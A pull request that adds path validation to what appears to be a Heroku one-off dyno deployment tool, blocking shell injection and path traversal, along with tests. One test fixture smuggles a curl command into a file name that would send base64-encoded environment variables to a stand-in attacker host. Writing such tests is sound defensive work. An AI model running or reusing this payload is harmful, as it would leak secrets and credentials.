### PR TITLE
fix: validate one-off dyno source paths before shell staging

### DIFF
--- a/src/tools/deploy-to-heroku.spec.ts
+++ b/src/tools/deploy-to-heroku.spec.ts
@@ -3,18 +3,53 @@ import path from 'node:path';
 import os from 'node:os';
 import { expect } from 'chai';
 import { Readable } from 'node:stream';
-import { DeployToHeroku, DeploymentOptions } from './deploy-to-heroku.js';
+import {
+  DeploymentOptions,
+  DeployToHeroku,
+  isSafeSourceRelativePath,
+  MAX_SOURCE_RELATIVE_PATH_LENGTH,
+  OneOffDynoConfig,
+} from './deploy-to-heroku.js';
 import AppService from '../services/app-service.js';
 import SourceService from '../services/source-service.js';
 import AppSetupService from '../services/app-setup-service.js';
 import BuildService from '../services/build-service.js';
 import sinon from 'sinon';
 import * as Heroku from '@heroku-cli/schema';
-import { Build } from '@heroku-cli/schema';
-import { AppSetup } from '@heroku-cli/schema';
-import { OneOffDynoConfig } from './deploy-to-heroku.js';
+import { AppSetup, Build } from '@heroku-cli/schema';
 import { RendezvousConnection } from '../services/rendezvous.js';
 import DynoService from '../services/dyno-service.js';
+
+describe('isSafeSourceRelativePath', () => {
+  it('accepts typical virtual paths including optional ./ prefix', () => {
+    expect(isSafeSourceRelativePath('app.js')).to.be.true;
+    expect(isSafeSourceRelativePath('./app.json')).to.be.true;
+    expect(isSafeSourceRelativePath('src/index.js')).to.be.true;
+    expect(isSafeSourceRelativePath('.gitignore')).to.be.true;
+    expect(isSafeSourceRelativePath('package-lock.json')).to.be.true;
+    expect(isSafeSourceRelativePath('lib/nested/file.js')).to.be.true;
+  });
+
+  it('rejects traversal, absolute roots, and malformed slashes', () => {
+    expect(isSafeSourceRelativePath('..')).to.be.false;
+    expect(isSafeSourceRelativePath('../secret')).to.be.false;
+    expect(isSafeSourceRelativePath('foo/../bar')).to.be.false;
+    expect(isSafeSourceRelativePath('/etc/passwd')).to.be.false;
+    expect(isSafeSourceRelativePath('foo//bar')).to.be.false;
+    expect(isSafeSourceRelativePath('foo/')).to.be.false;
+    expect(isSafeSourceRelativePath('./')).to.be.false;
+    expect(isSafeSourceRelativePath('')).to.be.false;
+  });
+
+  it('rejects control characters, spaces, and overlong paths', () => {
+    expect(isSafeSourceRelativePath('a\nb')).to.be.false;
+    expect(isSafeSourceRelativePath('a\rb')).to.be.false;
+    expect(isSafeSourceRelativePath('a\0b')).to.be.false;
+    expect(isSafeSourceRelativePath('bad path')).to.be.false;
+    expect(isSafeSourceRelativePath('a'.repeat(MAX_SOURCE_RELATIVE_PATH_LENGTH + 1))).to.be.false;
+    expect(isSafeSourceRelativePath('a'.repeat(MAX_SOURCE_RELATIVE_PATH_LENGTH))).to.be.true;
+  });
+});
 
 describe('DeployToHeroku', () => {
   // Increase timeout for async tests
@@ -253,6 +288,167 @@ describe('DeployToHeroku', () => {
       expect(result).to.have.property('exitCode', 0);
       expect(dynoServiceStub.create.calledOnce).to.be.true;
       expect(rendezvousStub.calledOnce).to.be.true;
+    });
+
+    it('should not create a one-off dyno when a source relativePath contains shell metacharacters', async function () {
+      this.timeout(TEST_TIMEOUT);
+      await createTempFile(
+        'app.json',
+        JSON.stringify({
+          name: 'test-app',
+          description: 'Test app',
+          stack: 'heroku-22'
+        })
+      );
+
+      const mockDyno = {
+        id: 'dyno-id',
+        attach_url: 'https://test.com/attach',
+        command: 'echo done'
+      };
+      dynoServiceStub.create.resolves(mockDyno);
+      sinon.stub(RendezvousConnection.prototype, 'connect').resolves({ output: '', exitCode: 0 });
+
+      const options: OneOffDynoConfig = {
+        name: 'test-app',
+        command: 'echo done',
+        rootUri: tempDir,
+        // Bounty-style payload: would break out of `> path` if this string were executed as shell.
+        sources: [
+          {
+            relativePath: 'x; curl https://attacker.example.invalid/?d=$(env|base64) #',
+            contents: 'harmless'
+          }
+        ]
+      };
+
+      const result = await deployToHeroku.run(options);
+      expect(result).to.not.be.null;
+      expect(
+        dynoServiceStub.create.called,
+        'dynoService.create must not run when relativePath is not a safe virtual path'
+      ).to.be.false;
+      expect(result).to.have.property('errorMessage');
+      expect((result as { errorMessage: string }).errorMessage).to.match(/relativePath|Invalid source/i);
+    });
+
+    it('should not create a one-off dyno when a source relativePath uses parent directory segments', async function () {
+      this.timeout(TEST_TIMEOUT);
+      await createTempFile(
+        'app.json',
+        JSON.stringify({
+          name: 'test-app',
+          description: 'Test app',
+          stack: 'heroku-22'
+        })
+      );
+      dynoServiceStub.create.resolves({
+        id: 'dyno-id',
+        attach_url: 'https://test.com/attach',
+        command: 'echo done'
+      });
+      sinon.stub(RendezvousConnection.prototype, 'connect').resolves({ output: '', exitCode: 0 });
+
+      const result = await deployToHeroku.run({
+        name: 'test-app',
+        command: 'echo done',
+        rootUri: tempDir,
+        sources: [{ relativePath: 'foo/../bar.js', contents: 'x' }]
+      } as OneOffDynoConfig);
+
+      expect(dynoServiceStub.create.called).to.be.false;
+      expect(result).to.have.property('errorMessage');
+      expect((result as { errorMessage: string }).errorMessage).to.match(/relativePath|Invalid source/i);
+    });
+
+    it('should not create a one-off dyno when a source relativePath is absolute', async function () {
+      this.timeout(TEST_TIMEOUT);
+      await createTempFile(
+        'app.json',
+        JSON.stringify({
+          name: 'test-app',
+          description: 'Test app',
+          stack: 'heroku-22'
+        })
+      );
+      dynoServiceStub.create.resolves({
+        id: 'dyno-id',
+        attach_url: 'https://test.com/attach',
+        command: 'echo done'
+      });
+      sinon.stub(RendezvousConnection.prototype, 'connect').resolves({ output: '', exitCode: 0 });
+
+      const result = await deployToHeroku.run({
+        name: 'test-app',
+        command: 'echo done',
+        rootUri: tempDir,
+        sources: [{ relativePath: '/tmp/evil.js', contents: 'x' }]
+      } as OneOffDynoConfig);
+
+      expect(dynoServiceStub.create.called).to.be.false;
+      expect(result).to.have.property('errorMessage');
+      expect((result as { errorMessage: string }).errorMessage).to.match(/relativePath|Invalid source/i);
+    });
+
+    it('should not create a one-off dyno when a source relativePath has an empty segment', async function () {
+      this.timeout(TEST_TIMEOUT);
+      await createTempFile(
+        'app.json',
+        JSON.stringify({
+          name: 'test-app',
+          description: 'Test app',
+          stack: 'heroku-22'
+        })
+      );
+      dynoServiceStub.create.resolves({
+        id: 'dyno-id',
+        attach_url: 'https://test.com/attach',
+        command: 'echo done'
+      });
+      sinon.stub(RendezvousConnection.prototype, 'connect').resolves({ output: '', exitCode: 0 });
+
+      const result = await deployToHeroku.run({
+        name: 'test-app',
+        command: 'echo done',
+        rootUri: tempDir,
+        sources: [{ relativePath: 'src//index.js', contents: 'x' }]
+      } as OneOffDynoConfig);
+
+      expect(dynoServiceStub.create.called).to.be.false;
+      expect(result).to.have.property('errorMessage');
+      expect((result as { errorMessage: string }).errorMessage).to.match(/relativePath|Invalid source/i);
+    });
+
+    it('should create a one-off dyno when sources use only safe virtual paths', async function () {
+      this.timeout(TEST_TIMEOUT);
+      await createTempFile(
+        'app.json',
+        JSON.stringify({
+          name: 'test-app',
+          description: 'Test app',
+          stack: 'heroku-22'
+        })
+      );
+
+      const mockDyno = {
+        id: 'dyno-id',
+        attach_url: 'https://test.com/attach',
+        command: 'echo done'
+      };
+      dynoServiceStub.create.resolves(mockDyno);
+      sinon.stub(RendezvousConnection.prototype, 'connect').resolves({ output: 'ok', exitCode: 0 });
+
+      const options: OneOffDynoConfig = {
+        name: 'test-app',
+        command: 'echo done',
+        rootUri: tempDir,
+        sources: [{ relativePath: 'app.js', contents: 'console.log(1)' }]
+      };
+
+      const result = await deployToHeroku.run(options);
+      expect(result).to.not.be.null;
+      expect(dynoServiceStub.create.calledOnce).to.be.true;
+      expect(result).to.have.property('exitCode', 0);
     });
   });
 });

--- a/src/tools/deploy-to-heroku.ts
+++ b/src/tools/deploy-to-heroku.ts
@@ -71,6 +71,36 @@ export type OneOffDynoResult = {
   errorMessage?: string;
 };
 
+export const MAX_SOURCE_RELATIVE_PATH_LENGTH = 512;
+
+const SAFE_SOURCE_PATH_SEGMENT = /^[a-zA-Z0-9._-]+$/;
+
+/** True if {@link relativePath} may be used unquoted in a POSIX shell `> path` redirect when staging one-off sources. */
+export function isSafeSourceRelativePath(relativePath: string): boolean {
+  if (relativePath.length === 0 || relativePath.length > MAX_SOURCE_RELATIVE_PATH_LENGTH) {
+    return false;
+  }
+  if (relativePath.includes('\0') || relativePath.includes('\n') || relativePath.includes('\r')) {
+    return false;
+  }
+  if (relativePath.startsWith('/')) {
+    return false;
+  }
+  const normalized = relativePath.replace(/^\.\/+/, '');
+  if (normalized.length === 0) {
+    return false;
+  }
+  for (const segment of normalized.split('/')) {
+    if (segment.length === 0 || segment === '.' || segment === '..') {
+      return false;
+    }
+    if (!SAFE_SOURCE_PATH_SEGMENT.test(segment)) {
+      return false;
+    }
+  }
+  return true;
+}
+
 /**
  * The DeploymentError class is used when
  * an error occurs during the deployment of
@@ -321,6 +351,14 @@ export class DeployToHeroku extends AbortController {
       // If sources are provided, pack them and modify the command
       let finalCommand = command;
       if (sources?.length) {
+        for (const source of sources) {
+          if (!isSafeSourceRelativePath(source.relativePath)) {
+            throw new Error(
+              'Invalid source.relativePath: use a relative virtual path with only letters, digits, ' +
+                '`.`, `_`, `-`, and `/` between segments; no `..`, no leading `/`, and no shell metacharacters.'
+            );
+          }
+        }
         const commands = [
           'TEMP_DIR=$(mktemp -d)',
           'cd $TEMP_DIR',
@@ -646,7 +684,16 @@ export const deployOneOffDynoSchema = z
     sources: z
       .array(
         z.object({
-          relativePath: z.string().describe('Virtual path for tarball entry.'),
+          relativePath: z
+            .string()
+            .min(1)
+            .max(MAX_SOURCE_RELATIVE_PATH_LENGTH)
+            .refine(isSafeSourceRelativePath, {
+              message:
+                'Invalid source.relativePath: relative virtual path must use only letters, digits, `.`, `_`, ' +
+                '`-`, and `/` between segments; no `..`, no leading `/`, and no shell metacharacters.'
+            })
+            .describe('Relative virtual path for each staged source file (strict character set).'),
           contents: z.string().describe('File contents.')
         })
       )


### PR DESCRIPTION
## Summary
This PR adds a strict **relative virtual path** allowlist (`isSafeSourceRelativePath`), enforces it in **`deployOneOffDyno`** before assembling the command, and mirrors the same rule in **`deployOneOffDynoSchema`** so invalid paths fail at validation time as well. Tests cover safe paths, injection-style payloads, traversal, absolute paths, empty segments, control characters, spaces, and max length.

## Type of Change

### Breaking Changes (major semver update)
- [ ] Add a `!` after your change type to denote a change that breaks current behavior

### Feature Additions (minor semver update)
- [ ] **feat**: Introduces a new feature to the codebase

### Patch Updates (patch semver update)
- [x] **fix**: Bug fix
- [ ] **deps**: Dependency upgrade
- [ ] **revert**: Revert a previous commit
- [ ] **chore**: Change that does not affect production code
- [ ] **refactor**: Refactoring existing code without changing behavior
- [x] **test**: Add/update/remove tests

## Testing
**Notes**:
No Heroku account required. Tests use stubbed services and do not execute constructed shell strings on the host.
**Steps**:
1. `npm install` (if needed)
2. `npm test` — expect full Mocha suite green (including new/updated tests in `src/tools/deploy-to-heroku.spec.ts`).

## Screenshots (if applicable)
N/A

## Related Issues
GitHub issue: N/A
GUS work item: [W-21883490](https://gus.lightning.force.com/lightning/r/ADM_Work__c/a07EE00002XQNn8YAH/view)